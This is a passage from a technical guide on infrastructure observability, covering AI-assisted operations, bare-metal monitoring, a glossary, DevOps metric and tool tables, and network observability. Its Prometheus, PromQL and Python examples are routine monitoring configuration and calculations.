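        return max_p                     # no traffic: sample everything
    new_p = current_p * (target_per_sec / observed_per_sec)
    return max(min_p, min(max_p, new_p))

# Sampled volume doubles from 1,000/s to 2,000/s against a 1,000/s target:
p = adjust_probability(current_p=0.10, observed_per_sec=2_000,
                       target_per_sec=1_000)
print(f"new sampling probability: {p:.3f}")
```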
**Stratified sampling:** Sample at different rates for different service tiers. Payment processing traces (high value): 100% sampling. Internal health checks: 0% sampling. User-facing API calls: 5% sampling.
**Continuous profiling integration:** Attaching CPU profiles to traces for the slowest spans allows identification of the specific code paths responsible for latency, not just the service or endpoint.
### AI-Driven Observability
Artificial intelligence is beginning to augment observability workflows in several practical ways:
**Automated root cause analysis:** ML models trained on historical incident data and telemetry can suggest probable root causes when a new incident occurs, reducing time to diagnosis. Tools like Grafana Sift (in preview as of 2025) analyze metrics, logs, and traces together to surface likely causes.
**Alert noise reduction:** ML classifiers trained on historical alert data can identify alerts that consistently resolve without human intervention and suppress them automatically, reducing alert fatigue.
**Natural language query:** LLM-based interfaces that translate natural language questions ("Why is the payment API slow right now?") into PromQL/LogQL/TraceQL queries, lowering the barrier to observability for engineers unfamiliar with query languages.
**Capacity forecasting:** Time-series forecasting models predict when resources will be exhausted based on historical growth trends, enabling proactive scaling before performance degrades.
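As a minimal stand-in for such models, a straight line fitted to daily usage samples already yields a useful exhaustion estimate (the sample data is hypothetical):

```python
# Linear-trend forecast: days until a volume fills, via least-squares slope.
def days_until_full(used_gb: list[float], capacity_gb: float) -> float:
    """Fit a line through daily usage samples; extrapolate to capacity."""
    n = len(used_gb)
    xs = range(n)
    x_mean = sum(xs) / n
    y_mean = sum(used_gb) / n
    slope = (sum((x - x_mean) * (y - y_mean) for x, y in zip(xs, used_gb))
             / sum((x - x_mean) ** 2 for x in xs))
    if slope <= 0:
        return float("inf")              # usage flat or shrinking
    return (capacity_gb - used_gb[-1]) / slope

# Growing ~10 GB/day toward a 1 TB volume:
usage = [500, 510, 520, 530, 540]
print(f"volume full in ~{days_until_full(usage, 1000):.0f} days")
```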
The important limitation: AI-driven observability augments human judgment; it does not replace it. Automated suggestions require human validation, and model outputs on novel failure modes (which are precisely the incidents that matter most) are inherently less reliable.
---
## 16. Observability for Bare-Metal Infrastructure
### Physical Server Monitoring
Bare-metal infrastructure requires observability at layers that cloud-native tooling often abstracts away: hardware health, IPMI/BMC metrics, hardware RAID status, physical network switch metrics.
**IPMI/BMC metrics** (via the ipmi_exporter):
```prometheus
# CPU temperature, fan speeds, power consumption, hardware health
ipmi_fan_speed_rpm{name="Fan 1"}
ipmi_temperature_celsius{name="CPU1 Temp"}
ipmi_dcmi_power_consumption_watts
ipmi_sensor_state{name="Drive Fault", state="ok"}
```
**Hardware RAID monitoring** (via smartmontools and mdadm exporters):
```prometheus
# SMART disk health
smartmon_device_smart_healthy{disk="/dev/sda", type="sat"}
smartmon_attr_value{disk="/dev/sda", name="Reallocated_Sector_Ct"}
# Software RAID (mdadm)
node_md_state{device="md0"}
node_md_disks_active{device="md0"}
node_md_disks{device="md0", state="failed"}
```
**Network switch monitoring** (via SNMP exporter):
```yaml
# snmp.yml
modules:
  cisco_ios:
    walk: [ifDescr, ifOperStatus, ifInOctets, ifOutOctets, ifInErrors, ifOutErrors]
    metrics:
      - name: ifOperStatus
        oid: 1.3.6.1.2.1.2.2.1.8
        type: gauge
        help: "Current operational state of the interface"
      - name: ifInErrors
        oid: 1.3.6.1.2.1.2.2.1.14
        type: counter
        help: "Number of inbound packets that had errors"
```
**Bare-metal server Prometheus scrape targets** (static configuration):
```yaml
# prometheus.yml
scrape_configs:
  - job_name: 'bare_metal_nodes'
    static_configs:
      - targets:
          - 'server-01.dc1.internal:9100'
          - 'server-02.dc1.internal:9100'
        labels:
          datacenter: dc1
          rack: A-12
      - targets:
          - 'server-03.dc2.internal:9100'
        labels:
          datacenter: dc2
  - job_name: 'ipmi'
    metrics_path: /metrics
    params:
      target:
        - 'server-01-ipmi.internal'
    static_configs:
      - targets: ['ipmi-exporter:9290']
    relabel_configs:
      - source_labels: [__param_target]
        target_label: instance
```
### Storage Array Observability
Enterprise storage arrays (NetApp, Pure Storage, Dell EMC) expose management APIs that can be scraped for performance and capacity metrics. Vendor-specific exporters exist for most major platforms:
```prometheus
# NetApp ONTAP metrics (via netapp-harvest)
netapp_volume_read_ops_total{svm="payments_svm", volume="transactions_vol"}
netapp_volume_average_latency_microseconds{svm="payments_svm", volume="transactions_vol"}
netapp_volume_size_available_bytes{svm="payments_svm", volume="transactions_vol"}
netapp_disk_busy_percentage{disk="0a.00.0"}
```
---
## 17. The Future of Observability
### Convergence of Telemetry Types
The traditional three-pillar model (metrics, logs, traces) is evolving toward a more unified model. OpenTelemetry treats all three telemetry types as first-class citizens of a single data model, enabling correlation and enrichment that crosses pillar boundaries.
Emerging fourth pillar: **continuous profiling**. CPU and memory profiles, attached to traces and correlated with metrics, provide code-level detail that none of the traditional three pillars offers. Grafana Pyroscope, Polar Signals, and Parca represent this category. Combining a trace span with a CPU flame graph for the same request allows precise identification of the code path responsible for latency, not just the service or function.
### eBPF as the Universal Instrumentation Layer
eBPF's trajectory suggests it will become the dominant instrumentation mechanism for infrastructure observability. Its advantages — zero application modification, kernel-level visibility, near-zero overhead compared to agent-based approaches — make it particularly compelling for large-scale environments with heterogeneous applications.
The practical implication: the distinction between "instrumented" and "uninstrumented" applications will fade. All applications running on a modern Linux kernel with eBPF tooling will produce meaningful telemetry, regardless of whether application developers wrote any instrumentation code.
### OpenTelemetry as the Universal Standard
OpenTelemetry is well on its way to becoming the universal instrumentation standard for cloud-native applications. As of 2025-2026, virtually every major observability backend has adopted OTLP (OpenTelemetry Protocol) as a primary ingest format. Proprietary instrumentation agents (Datadog Agent, New Relic agent) now serve primarily as configuration and enrichment layers on top of OTel SDKs.
The practical implication: investment in OpenTelemetry instrumentation is durable. As backends are replaced or consolidated, instrumentation code remains valid. The instrumentation-backend coupling that locked organizations into specific vendors for decades is being broken.
### AI-Augmented Operations
The 2025-2030 timeframe will see AI and LLM capabilities integrated deeply into observability tooling. The most likely developments:
**Automated incident triage:** AI systems that receive alert notifications, query relevant telemetry, correlate with deployment history, and produce structured incident summaries within minutes of alert firing — reducing the cognitive load on on-call engineers at the most stressful point of an incident.
**Proactive anomaly detection:** ML models continuously watching all metrics streams for deviations from learned baselines, detecting potential incidents before they become user-impacting.
**Natural language observability:** Conversational interfaces for querying telemetry, making observability accessible to engineers who are not experts in PromQL, LogQL, or TraceQL.
**Self-healing systems:** Closed-loop automation where AI systems not only detect and diagnose incidents but execute remediation actions — scaling deployments, rolling back releases, toggling feature flags — with human approval required only for high-risk actions.
The caution: these capabilities augment human judgment but cannot replace it. AI systems trained on historical data are most confident about the failure modes they have seen before, and least reliable for novel failures — precisely the incidents that matter most. The observability engineer's role evolves from "query the telemetry to find the answer" to "design the instrumentation and AI context that enables automated triage, and validate AI outputs against production reality."
---
## 18. Large Observability Glossary
The following table defines over 100 key technical terms used in modern observability, monitoring, and distributed systems operations.
|Term|Category|Explanation|Formula / Tool|Example|
|---|---|---|---|---|
|SLI (Service Level Indicator)|Reliability|Quantitative measurement of a specific service behavior aspect|Measured ratio: successes / total requests|99.2% of payments completed in < 500ms|
|SLO (Service Level Objective)|Reliability|Internal target range for an SLI over a time window|Target threshold over rolling window|99.9% of payments must succeed over 28 days|
|SLA (Service Level Agreement)|Reliability|External contractual commitment to customers, backed by penalties|SLA < SLO (must have engineering headroom)|Contract guarantees 99.5% API availability|
|Error Budget|Reliability|Allowable non-compliance time derived from the SLO|1 - SLO (e.g., 0.1% = ~43min/month for 99.9%)|43 minutes of downtime allowed per month|
|Burn Rate|Reliability|Rate at which error budget is consumed relative to budget|Error Rate / (1 - SLO)|Burn rate of 2x means budget exhausted in 14 days|
|MTTR (Mean Time To Recover)|Reliability|Average time from failure detection to service restoration|Sum(recovery times) / incident count|Average incident resolved in 22 minutes|
|MTBF (Mean Time Between Failures)|Reliability|Average time between incidents|Total uptime / number of incidents|Payment service fails on average every 45 days|
|MTTD (Mean Time To Detect)|Reliability|Average time from failure start to detection|Sum(detection times) / incident count|Monitoring detects failures within 90 seconds|
|MTTA (Mean Time To Acknowledge)|Reliability|Average time from alert fire to engineer response|Sum(ack times - alert times) / alerts|On-call acknowledges within 4 minutes|
|Availability|Reliability|Percentage of time service meets SLO|(Total Time - Downtime) / Total Time × 100|Payment API 99.97% available last quarter|
|Toil|SRE|Manual, repetitive, automatable operational work|Toil hours / Total engineering hours|Manually restarting pods after OOM kills|
|Golden Signals|Observability|Latency, Traffic, Errors, Saturation — minimum viable telemetry|4 metrics categories (Google SRE)|HTTP latency p99, RPS, 5xx rate, CPU%|
|Metric|Metrics|Numeric time-series measurement with labels|value{labels} @ timestamp|`http_requests_total{status="200"} 15423`|
|Counter|Metrics|Monotonically increasing metric, reset only on restart|rate(counter[window]) for rate calculation|`http_requests_total` increases with each request|
|Gauge|Metrics|Metric that can increase or decrease|Current value meaningful|`node_memory_MemAvailable_bytes`|
|Histogram|Metrics|Distribution of values across pre-defined buckets|histogram_quantile(0.99, sum(rate(metric_bucket[5m])) by (le))|Request latency distribution by bucket|
|Summary|Metrics|Pre-computed quantiles on the client side|quantile label carries percentile|p50, p90, p99 latency calculated by app|
|Cardinality|Metrics|Number of unique time series for a metric|Count of unique label value combinations|1M unique user_ids = 1M time series (problematic)|
|Label|Metrics|Key-value metadata attached to a metric|`{key="value"}` in Prometheus format|`{service="payment", env="prod"}`|
|PromQL|Metrics|Prometheus Query Language for time-series data|Functional language with aggregation, math, time functions|`rate(http_errors[5m]) / rate(http_requests[5m])`|
|Recording Rule|Metrics|Pre-computed PromQL expression stored as new time series|Evaluates on interval, stores result|Pre-compute p99 latency to speed dashboards|
|Alerting Rule|Metrics|PromQL expression that triggers alert when true for duration|`expr > threshold for: duration`|`error_rate > 0.05 for: 5m` → PagerDuty|
|Remote Write|Metrics|Protocol for Prometheus to send metrics to remote storage|HTTP POST with Snappy-compressed protobuf|Prometheus → Grafana Mimir via remote_write|
|Scraping|Metrics|Prometheus polling a target's /metrics HTTP endpoint|Pull model; Prometheus controls schedule|Prometheus scrapes node_exporter every 15s|
|Exporter|Metrics|Adapter exposing non-native metrics in Prometheus format|Translates system metrics to /metrics endpoint|postgres_exporter exposes PG metrics|
|node_exporter|Metrics|Prometheus exporter for Linux OS and hardware metrics|DaemonSet on each node|CPU, memory, disk, network metrics per host|
|kube-state-metrics|Kubernetes|Exporter for Kubernetes object state metrics|Reads K8s API, exposes as Prometheus metrics|`kube_pod_status_phase`, `kube_deployment_status_replicas`|
|cAdvisor|Kubernetes|Container resource usage metrics (built into kubelet)|`/metrics/cadvisor` on kubelet port|`container_cpu_usage_seconds_total`|
|Prometheus Operator|Kubernetes|Kubernetes operator managing Prometheus via CRDs|ServiceMonitor, PrometheusRule, Alertmanager CRDs|Teams define ServiceMonitors for auto-discovery|
|ServiceMonitor|Kubernetes|CRD defining scrape configuration for a service|`monitoring.coreos.com/v1`|Describes how to scrape payment-service metrics|
|PrometheusRule|Kubernetes|CRD defining alerting and recording rules|Applied automatically by Prometheus Operator|Alert rule as Kubernetes resource in namespace|
|HPA|Kubernetes|Horizontal Pod Autoscaler — scales pod count on metrics|`desired = ceil(current × currentMetricValue / desiredMetricValue)`|Scale to 20 pods when RPS per pod > 1000|
|PDB|Kubernetes|PodDisruptionBudget — min available pods during disruption|minAvailable or maxUnavailable|Keep 2/3 pods running during node drain|
|etcd|Kubernetes|Distributed KV store for all Kubernetes cluster state|Raft consensus protocol|Stores every pod spec, configmap, secret|
|Log|Logs|Event record produced by application or infrastructure|Structured (JSON) or unstructured (plain text)|`{"level":"ERROR","event":"payment_failed"}`|
|Structured Log|Logs|Log record in machine-readable format (JSON)|Key-value fields enable querying|`{"trace_id":"abc", "user_id":"123", "error":"timeout"}`|
|Log Level|Logs|Severity classification of a log entry|DEBUG, INFO, WARN, ERROR, FATAL|ERROR level requires operator attention|
|Log Aggregation|Logs|Centralized collection of logs from multiple sources|Shipper → Storage → Query|Promtail → Loki → Grafana|
|Loki|Logs|Horizontally scalable log aggregation system|Labels for index, object storage for content|Grafana Loki indexes {namespace, app, level}|
|LogQL|Logs|Grafana Loki query language|Log pipeline and metric queries|`{namespace="payments"} \|= "ERROR" \| json`|
|Promtail|Logs|Log collector agent that ships to Loki|DaemonSet tailing /var/log/pods/|Enriches logs with K8s metadata|
|Log Retention|Logs|Duration for which logs are stored|Configurable per stream in Loki|Security logs: 1 year, Debug logs: 7 days|
|Trace|Tracing|Complete record of a request's path across services|Root span + child spans forming tree|Full payment journey from browser to database|
|Span|Tracing|Single unit of work within a trace|span_id, trace_id, parent_id, start_time, duration|`fraud.Evaluate`: 48ms, status OK|
|Trace Context|Tracing|Metadata propagated with a request across service boundaries|W3C `traceparent` header|`00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01`|
|Distributed Tracing|Tracing|Tracking requests across multiple services|Context propagation + span collection|Trace from browser through 5 microservices|
|Tempo|Tracing|Grafana distributed tracing backend|Object storage backend, TraceQL query|Stores 1TB/day of trace data at $0.02/GB|
|TraceQL|Tracing|Grafana Tempo's trace query language|Attribute-based trace search|`{.service.name="X" && status=error && duration>1s}`|
|Exemplar|Tracing|Trace ID attached to a histogram metric sample|Prometheus exemplar format|Latency spike linked to trace for investigation|
|OpenTelemetry|Standards|CNCF vendor-neutral telemetry standard (API+SDK+protocol)|Unifies instrumentation across languages|Go app sends OTLP to Collector → Tempo + Mimir|
|OTLP|Standards|OpenTelemetry Protocol for telemetry transmission|Protobuf over gRPC or HTTP|OTel SDK → Collector via grpc:4317|
|OTel Collector|Standards|Vendor-agnostic telemetry pipeline: receive, process, export|Receivers → Processors → Exporters|Tail samples traces before forwarding to Tempo|
|W3C TraceContext|Standards|Standard HTTP headers for trace context propagation|`traceparent`, `tracestate` headers|All services must propagate to enable full traces|
|RED Method|Methodology|Rate, Errors, Duration — API observability model|Counter, Counter, Histogram|Payment API: 1200 RPS, 0.2% errors, 120ms p99|
|USE Method|Methodology|Utilization, Saturation, Errors — resource observability|Gauge/Percentage, Queue/Delay, Counter|DB: 70% CPU, 5 waiting connections, 0 errors|
|Four Golden Signals|Methodology|Latency, Traffic, Errors, Saturation (Google SRE)|Four metric types|Minimum viable production monitoring|
|Head-Based Sampling|Tracing|Sampling decision made at trace start|Fixed % or coin flip|Sample 10% of all traces|
|Tail-Based Sampling|Tracing|Sampling decision made after trace complete|Policy on full trace attributes|Keep 100% errors, 1% successful traces|
|Alertmanager|Alerting|Prometheus companion for alert routing, dedup, notification|Dedup → Group → Route → Deliver|Routes critical alerts to PagerDuty, info to Slack|
|Alert Fatigue|Alerting|Engineer desensitization from excessive non-actionable alerts|High noise-to-signal ratio|On-call ignores page because "it always fires"|
|Inhibition|Alerting|Suppressing child alerts when parent alert is active|Source match → suppress target|Suppress service alerts when entire cluster is down|
|Silence|Alerting|Temporary suppression of specific alert|Time-bounded label match|Silence disk alert during planned migration|
|Grafana|Visualization|Open-source observability and data visualization platform|Multi-datasource; dashboards, panels, alerting|Dashboards for Prometheus, Loki, Tempo, Mimir|
|Dashboard|Visualization|Collection of panels sharing time range and variables|Grid of panels with parameterized queries|Service health dashboard with namespace selector|
|Panel|Visualization|Individual visualization unit in Grafana|Time series, Stat, Gauge, Table, Heatmap|p99 latency time series panel|
|Heatmap|Visualization|2D density chart showing distribution over time|X: time, Y: value bucket, Color: count|Latency distribution showing bimodal behavior|
|Grafana Mimir|Storage|Horizontally scalable Prometheus-compatible metrics storage|Object storage backend (S3), multi-tenant|Long-term metrics retention at low cost|
|Grafana Pyroscope|Profiling|Continuous profiling storage and visualization|CPU flame graphs, memory profiles|Identify hot code path causing CPU spike|
|eBPF|Advanced|Linux kernel feature for safe in-kernel programs|Kernel hooks without module development|Capture all syscalls for security audit|
|Flame Graph|Profiling|CPU time attribution visualization by call stack|Y: call depth, X: time proportion|Identify 40% of CPU in JSON serialization|
|Service Mesh|Infrastructure|Network proxy layer providing mTLS, observability, policy|Sidecar proxy (Envoy) per pod|Istio provides metrics/traces for all services|
|mTLS|Security|Mutual TLS — both parties authenticate via certificate|X.509 client + server cert verification|All inter-service calls authenticated and encrypted|
|Zero Trust|Security|No implicit trust from network location|Authenticate + authorize every request|Pod in same namespace still needs service account|
|Anomaly Detection|Advanced|Identifying deviations from established baseline|Statistical: mean ± N×stddev; ML: learned models|Traffic 3x above 2-week average triggers alert|
|Log Cardinality|Logs|Number of unique label values in Loki streams|Count(unique label combinations)|High cardinality degrades Loki query performance|
|Metric Aggregation|Metrics|Combining multiple time series into one|sum(), avg(), max(), min() by (label)|Sum error rates across 200 pods by service|
|Time Window|Metrics|Duration for rate/average/percentile calculation|[5m], [1h], [28d] in PromQL|`rate(metric[5m])` = per-second rate over 5m|
|Federation|Metrics|Hierarchical Prometheus pulling from other Prometheuses|Parent Prometheus scrapes child via /federate|Central Prometheus aggregates all cluster metrics|
|Thanos|Metrics|CNCF project for Prometheus HA and long-term storage|Sidecar + Store + Query components|Compatible alternative to Mimir|
|Cortex|Metrics|CNCF project for horizontally scalable Prometheus storage|Predecessor to Grafana Mimir|Formerly powered Grafana Cloud; superseded by Mimir|
|TSDB|Metrics|Time Series Database — Prometheus's local storage engine|2-hour blocks, WAL, Gorilla compression|1.3 bytes/sample compressed on disk|
|Ingester|Metrics|Mimir/Loki/Tempo component receiving and buffering writes|In-memory + WAL before flush to object storage|3 ingesters for replication factor 3|
|Compaction|Metrics|Merging small TSDB blocks into larger ones|Background process, improves query performance|2h blocks compacted to 6h, 24h, 7d blocks|
|Retention|Metrics|Duration for which metrics/logs/traces are stored|Configurable; cost vs utility tradeoff|Metrics 1 year in Mimir, logs 30 days in Loki|
|Synthetic Monitoring|Observability|Scripted simulation of user journeys to test availability|External probe from multiple locations|Blackbox exporter pinging API every 30s|
|RUM|Frontend|Real User Monitoring — telemetry from actual users' browsers|Web Vitals API, OTel JS SDK|300ms LCP measured from 10,000 real browser loads|
|LCP|Frontend|Largest Contentful Paint — when main content loads|Browser Performance API|Good: <2.5s; Poor: >4s|
|INP|Frontend|Interaction to Next Paint — UI responsiveness|Browser Performance API|Good: <200ms; Poor: >500ms|
|Service Topology|Observability|Map of service dependencies from telemetry|Derived from trace spans + service mesh data|Grafana node graph showing all inter-service calls|
|Dependency Map|Observability|Visualization of upstream/downstream service relationships|Generated from trace span relationships|Payment service depends on fraud, inventory, DB|
|SLO Compliance|Reliability|Fraction of time SLO has been met over measurement window|Compliant time / Total time|SLO met for 99.94% of the 28-day window|
|Error Budget Policy|Reliability|Defined team response to different error budget consumption levels|Trigger conditions for freeze, sprint, exec review|<25% remaining → reliability sprint, no new features|
|Postmortem|Incident|Blameless retrospective analysis of production incident|Blameless, systemic, action-item-producing|5-why analysis identifying SMTP relay as root cause|
|Flakiness|CI/CD|Test failing intermittently without code changes|Failure rate > 1% without code change|Database integration test timing-sensitive|
|Lead Time|DORA|Time from code commit to production deployment|Deploy timestamp - commit timestamp|Average 45 minutes from commit to production|
|Deployment Frequency|DORA|How often code is deployed to production|Deploys per day/week|12 production deployments per day|
|Change Failure Rate|DORA|Percentage of deployments causing production incidents|Failing deploys / total deploys|2% of deploys require rollback|
|Canary Deployment|Delivery|Route small % of traffic to new version before full rollout|Traffic split: 1% → 5% → 25% → 100%|2% of payments routed to new service version|
|Feature Flag|Delivery|Code switch enabling/disabling functionality without deploy|Boolean/percentage rollout in config|New payment method enabled for 10% of users|
|OOM Kill|Kubernetes|Container terminated by kernel when memory limit exceeded|Memory usage > limit → SIGKILL|Recommendation service killed after exceeding its 2GB limit|
|CrashLoopBackOff|Kubernetes|Container repeatedly crashing or failing liveness, restarted with backoff|Exponential backoff: 10s, 20s, 40s... capped at 5m|Service failing liveness probe due to upstream down|
|Tail Latency|Performance|Latency at high percentiles (p99, p99.9)|histogram_quantile(0.99, ...)|p99 = 850ms despite p50 = 45ms|
|Saturation|Performance|How full a resource is; leading indicator of failure|current_usage / capacity|85% thread pool utilization predicts degradation|
|Backpressure|Architecture|Mechanism for slow consumers to signal overload to producers|Blocking, drop, or buffer with feedback|Kafka consumer lag signals slow Loki ingestion|
|Circuit Breaker|Architecture|Stops calls to failing dependency to prevent cascade|Closed → Open → Half-open state machine|Stops calling fraud service after 50% errors|
|Bulkhead|Architecture|Resource isolation to prevent cross-domain failure|Separate thread pools per dependency|DB pool for transactions separate from reports|
|Dead Letter Queue|Architecture|Destination for messages that exceed retry limit|Consumer fails N times → DLQ|Failed payment events queued for manual review|
|Sampling|Tracing|Deciding which fraction of traces to store|Head-based %, tail-based policy|Store 100% errors, 5% successful traces|
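A few of the formulas from the table, written out as complete PromQL queries. The metric names (`http_requests_total`, `http_request_duration_seconds_bucket`) and the 99.9% SLO are illustrative assumptions:

```promql
# SLI: fraction of successful requests (successes / total)
sum(rate(http_requests_total{status!~"5.."}[5m]))
  / sum(rate(http_requests_total[5m]))

# Burn rate: error rate divided by the error budget (1 - SLO), here SLO = 99.9%
(
  sum(rate(http_requests_total{status=~"5.."}[1h]))
    / sum(rate(http_requests_total[1h]))
) / 0.001

# Tail latency: p99 from a histogram's buckets
histogram_quantile(0.99,
  sum(rate(http_request_duration_seconds_bucket[5m])) by (le))
```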
---
## 19. DevOps Metrics Reference Table
|Metric|Full Name|Meaning|Formula|Tool / Source|Elite Benchmark|
|---|---|---|---|---|---|
|DF|Deployment Frequency|How often code is deployed to production|Count(production deploys) / time period|CI/CD platform (GitHub Actions, GitLab, Jenkins)|Multiple per day|
|LT|Lead Time for Changes|Elapsed time from commit to production|Deploy timestamp - first commit timestamp|VCS + CI/CD webhook|< 1 hour|
|CFR|Change Failure Rate|% of deploys causing production incidents|Incidents caused by deploy / total deploys × 100|Deploy events + incident events|< 5%|
|MTTR|Mean Time To Restore|Average time from incident detection to recovery|Sum(resolution time - detection time) / incidents|Incident management (PagerDuty, OpsGenie)|< 1 hour|
|MTTD|Mean Time To Detect|Average time from failure start to alert firing|Sum(alert time - failure start time) / incidents|Monitoring system alert timestamps|< 2 minutes|
|MTTA|Mean Time To Acknowledge|Average time from alert to engineer response|Sum(ack time - alert time) / alerts|On-call platform metrics|< 5 minutes|
|MTBF|Mean Time Between Failures|Average time between production incidents|Total uptime / number of incidents|Incident tracking system|> 30 days|
|Availability|Availability %|Fraction of time service meets SLO|(Total time - downtime) / total time × 100|SLO monitoring (Prometheus, Grafana)|> 99.99%|
|Error Budget|Error Budget|Allowable non-compliance derived from SLO|1 - SLO target|Prometheus + Grafana SLO dashboard|> 50% remaining|
|Burn Rate|Error Budget Burn Rate|Speed at which error budget is consumed|Error rate / (1 - SLO)|Prometheus multi-window alerting|< 1x (on track)|
|TFR|Test Flakiness Rate|% of CI runs with non-deterministic test failures|Flaky failures / total test runs|CI analytics (Trunk, BuildKite Analytics)|< 1%|
|BSR|Build Success Rate|% of CI pipeline runs that complete successfully|Successful builds / total builds × 100|CI platform metrics|> 95%|
|p99 Latency|99th Percentile Latency|Slowest 1% of request response times|histogram_quantile(0.99, rate(duration_bucket[5m]))|Prometheus histogram|Context-dependent SLO|
|RPS|Requests Per Second|Current traffic volume|rate(http_requests_total[5m])|Prometheus|Baseline × capacity headroom|
|ERR|Error Rate|Fraction of requests returning errors|rate(errors[5m]) / rate(requests[5m])|Prometheus|< SLO threshold|
|CPU Util|CPU Utilization|Fraction of CPU capacity in use|1 - avg(rate(node_cpu_idle[5m]))|node_exporter|< 70% sustained|
|Mem Pressure|Memory Utilization|Fraction of memory capacity in use|1 - node_memory_available / node_memory_total|node_exporter|< 80%|
|Alert Noise|Alert-to-Incident Ratio|Fraction of alerts that represent real incidents|Real incidents / total alert fires|> 50% (majority of alerts actionable)|
|On-Call Load|Pages Per Week Per Engineer|Volume of operational interruptions per engineer|Total pages / (engineer count × week)|PagerDuty / OpsGenie|< 5 per week|
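The "multi-window alerting" referenced in the Burn Rate row can be sketched as a Prometheus alerting rule. The recording rule names (`sli:error_ratio:rate1h`, `sli:error_ratio:rate5m`) and the 99.9% SLO are assumptions; the 14.4x threshold is the standard fast-burn figure (2% of a 30-day budget consumed in one hour):

```yaml
# Page only when both the long and short windows burn fast —
# the short window prevents paging long after the spike has ended.
- alert: ErrorBudgetFastBurn
  expr: |
    (sli:error_ratio:rate1h / 0.001) > 14.4
    and
    (sli:error_ratio:rate5m / 0.001) > 14.4
  labels:
    severity: critical
  annotations:
    summary: "Error budget burning at >14.4x; 30-day budget gone in ~2 days"
```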
---
## 20. Observability Tools Reference Table
|Tool|Category|Primary Purpose|Backend|Deployment|License|Managed Option|
|---|---|---|---|---|---|---|
|Prometheus|Metrics|Time-series metrics collection and storage|Local TSDB|Single binary|Apache 2.0|None (OSS only)|
|Grafana|Visualization|Dashboards, alerting, data exploration|Multiple data sources|Container/VM|AGPL 3.0|Grafana Cloud|
|Grafana Loki|Logs|Log aggregation and querying|Object storage (S3/GCS)|Kubernetes/VM|AGPL 3.0|Grafana Cloud|
|Grafana Tempo|Tracing|Distributed trace storage and querying|Object storage (S3/GCS)|Kubernetes|Apache 2.0|Grafana Cloud|
|Grafana Mimir|Metrics|Horizontally scalable Prometheus storage|Object storage (S3/GCS)|Kubernetes|AGPL 3.0|Grafana Cloud|
|Grafana Pyroscope|Profiling|Continuous profiling (CPU/memory flame graphs)|Object storage|Kubernetes|AGPL 3.0|Grafana Cloud|
|Grafana Alloy|Collection|Unified telemetry agent (metrics, logs, traces)|All Grafana backends|DaemonSet/binary|Apache 2.0|None|
|OpenTelemetry|Standards|Vendor-neutral telemetry instrumentation SDK+protocol|Any OTLP backend|Library/agent|Apache 2.0|None (standard)|
|OTel Collector|Collection|Telemetry pipeline: receive, process, export|Multiple exporters|Container/DaemonSet|Apache 2.0|None|
|Alertmanager|Alerting|Alert routing, deduplication, notification delivery|In-memory + filesystem|Container|Apache 2.0|None|
|Prometheus Operator|Kubernetes|Kubernetes operator for Prometheus lifecycle|CRD-based|Kubernetes operator|Apache 2.0|None|
|kube-state-metrics|Kubernetes|Kubernetes object state metrics for Prometheus|None (exporter)|K8s Deployment|Apache 2.0|None|
|node_exporter|Metrics|Linux OS and hardware metrics|None (exporter)|DaemonSet/systemd|Apache 2.0|None|
|cAdvisor|Kubernetes|Container resource metrics (embedded in kubelet)|None (exporter)|Built into kubelet|Apache 2.0|None|
|Blackbox Exporter|Probing|External endpoint availability probing|None (exporter)|Container/VM|Apache 2.0|None|
|Promtail|Logs|Log collection agent for Loki|Grafana Loki|DaemonSet|Apache 2.0|None|
|Thanos|Metrics|Prometheus HA and long-term storage|Object storage (S3/GCS)|Kubernetes|Apache 2.0|None|
|Jaeger|Tracing|CNCF distributed tracing backend|Elasticsearch/Cassandra|Kubernetes|Apache 2.0|None|
|Zipkin|Tracing|Distributed tracing backend (legacy)|MySQL/Elasticsearch|Container|Apache 2.0|None|
|Falco|Security|Runtime security monitoring via eBPF/kernel module|Logs/SIEM|DaemonSet|Apache 2.0|Falco Cloud|
|Cilium|Networking|eBPF-based networking with built-in observability|Prometheus/Hubble UI|Kubernetes DaemonSet|Apache 2.0|None|
|Pixie|Observability|eBPF-based automatic K8s observability|In-cluster (ClickHouse)|Kubernetes|Apache 2.0|None|
|k6|Testing|Load testing with observability integration|InfluxDB/Prometheus|CLI/Kubernetes|AGPL 3.0|Grafana Cloud|
|Grafana OnCall|Incident Mgmt|On-call scheduling, escalation, incident response|PostgreSQL|Kubernetes|AGPL 3.0|Grafana Cloud|
|Grafana Faro|Frontend|Real User Monitoring and browser telemetry|Loki + Tempo|JavaScript SDK|Apache 2.0|Grafana Cloud|
|Parca|Profiling|Continuous profiling with eBPF|Object storage|Kubernetes|Apache 2.0|None|
|VictoriaMetrics|Metrics|High-performance Prometheus-compatible storage|Local/object storage|Container|Apache 2.0 / Enterprise|None|
|Cortex|Metrics|Multi-tenant Prometheus (Mimir predecessor)|Object storage|Kubernetes|Apache 2.0|None|
|SigNoz|Observability|Open-source APM unifying metrics, traces, and logs (OTel-native)|ClickHouse|Kubernetes/Docker|Apache 2.0 / Enterprise|SigNoz Cloud|
|HyperDX|Observability|Open-source APM (OTel-native)|ClickHouse|Docker|MIT|HyperDX Cloud|
---
## 21. Network Observability
### Why Network Observability Is a First-Class Concern
Networks are the connective tissue of distributed systems. Every microservice call, every database query, every event published to a message queue traverses a network path. Yet network observability is consistently under-invested compared to application and infrastructure observability — teams instrument their services meticulously and leave the network between them as a black box.
This creates blind spots that manifest repeatedly in production incidents. A database that appears slow from the application perspective may actually have perfectly healthy query execution times, with the delay entirely in the network path between the application and the database. A service that reports healthy metrics may be silently retransmitting 15% of its TCP segments, degrading throughput and adding latency that no application-level metric captures. A Kubernetes cluster that appears stable may have a single node with a failing NIC causing sporadic packet loss affecting all pods on that node.
Network observability closes these gaps by making the behavior of the network path between components as visible as the behavior of the components themselves.
### Network Problems That Observability Detects
|Network Issue|Description|Observable Signal|Impact|
|---|---|---|---|
|Packet loss|Packets dropped in network path (congestion, faulty hardware, firewall)|TCP retransmission rate, `node_network_receive_drop_total`|Latency spikes, throughput degradation, connection timeouts|
|High RTT|Increased round-trip time due to distance, congestion, or routing|Per-connection RTT via `ss -ti` or eBPF; falling throughput rate|Application latency, timeout cascade|
|Connection saturation|Exhausted TCP connection tables, port exhaustion, backlog overflow|conntrack count vs max, `node_sockstat_TCP_alloc`|New connections rejected, service unavailability|
|TCP congestion|Congestion window reduction, slow start re-entry|`node_netstat_TcpExt_TCPSlowStartRetrans`|Throughput collapse on affected paths|
|Retransmissions|Repeated packet delivery due to loss or timeout|`node_netstat_Tcp_RetransSegs` rate|Hidden latency, bandwidth waste|
